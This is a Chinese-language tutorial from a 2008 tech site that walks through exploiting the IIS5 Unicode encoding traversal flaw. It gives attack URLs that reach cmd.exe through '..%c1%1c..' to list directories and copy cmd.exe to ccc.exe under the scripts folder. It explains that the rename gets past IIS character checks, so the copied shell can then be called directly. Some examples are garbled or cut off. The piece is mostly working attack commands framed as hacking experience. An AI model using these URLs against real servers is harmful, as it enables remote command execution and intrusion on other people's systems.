| | 网站首页 | 业界信息 | 技术教程 | 解决方案 | 建站素材 | 留言本站 | 云瑞产品 | 下载中心 | 在线影院 | 技术论坛 | | |
![]() |
|
| 您现在的位置: 云通网络 >> 技术教程 >> 网络技术 >> 服务器专区 >> 技术应用 >> 正文 |
|
|||||
| IIS5 UNICODE 编码漏洞的利用心得 | |||||
作者:本站整理 文章来源:云通网络 点击数: 更新时间:2008-5-12 ![]() |
|||||
|
大家一定都知道那个风光了很久的IIS5 UNICODE 编码漏洞吧。没办法,第一篇教程不知道写什么好,随便先凑合着,就写一下这个漏洞的攻击心得吧。 1 首先我们来看看这个漏洞的原理。 例如: %c1%hh %c0%hh (0x00〈= 0xhh 〈 0x40) 例如 http://192.168.8.48/A.ida/%c1%01.ida http://192.168.8.48/A.ida/%c1%02.ida http://192.168.8.48/A.ida/%c0%21.ida 这就意味着你能利用这些编码的特点。 例如: 所以我们就可以用这种方法进入一些目录。 (1)http://192.168.8.48/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 这样我们将得到 〈DIR〉 wcount 9 File(s) 935,233 bytes
(2) 我们也可以利用此BUG得到一些系统文件的内容 "default.asp" 是一个存在的 .ASP 文件, "a.exe" 是一个随机的 .EXE 文件名. 它可以不存在。 在英文版本中使用 %c1%af 能正常利用这个漏洞。
2.了解了漏洞的详细资料。让我们来说说怎么利用。 让我们来进行下面的操作。 b.http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe 这个URL语句的执行的命令是:利用NT/2000下的命令解释程序cmd.exe来执行一个拷贝命令。 copy c:\winnt\system32\cmd.exe ccc.exe 它把c:\winnt\system32\cmd.exe 拷贝到了c:\inetpub\scripts\ccc.exe 就是DOS命令中的空格,在URL中就要换成“+”号。 你要执行copy c:\winnt\system32\cmd.exe ccc.exe 相对应的是http://ip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe 其中/scripts/..%c1%1c../winnt/system32/cmd.exe?/c是固定的,他的作用是调用c:\winnt\system32\cmd.exe来执行命令。
噢,忘了说为什么要拷贝cmd.exe了。 因为微软的iis加载程序的时候检测到有串cmd.exe的话就要检测特殊字符“&(,;%<>”,所以必须改名。
c.这时c:\winnt\system32\cmd.exe已经拷贝到了c:\inetpub\scripts\ccc.exe 通过 http://ip/scripts/ccc.exe?/c 我们就可以调用到cmd.exe了,就是说不用那个编码了。 +c:\inetpub\wwwroot\default.asp">http://ip/ 文章来自:云通信息技术网 www.kmxm.net版权声明:部分内容转载于网络,其版权属于原作者,如果有任何内容方面的问题,请联系我们。
|
|||||
| 文章录入:情之何物 责任编辑:情之何物 | |||||
| 【在百度上搜索】 【社区讨论】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| 黑客攻击常见方法及安全策略 WEB服务器常见漏洞介绍 SQL Server 2000的安全配置 Microsoft IIS漏洞整理 匿名用户入侵NT获得Admin权限 DOS攻击原理以及常见方法介绍 80端口web服务攻击痕迹 千兆网线的做法,千兆水晶头的 网络组建基础必备:网线制作 菜鸟最初级网络安全常识 |
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
| | 设为首页 | 加入收藏 | 联系站长 | 友情链接 | 高清电视 | 马龙社区 | 本站Alexa排名 | 在线翻译 | |
![]() |
Copyright © 2004-2007 云瑞恒通 Kmxm.Net. All Rights Reserved. 业务联系:0874-8880726 E-mail:kmxmxy@163.com QQ:32106551 备案序号:滇ICP备05005610号 站长:admin |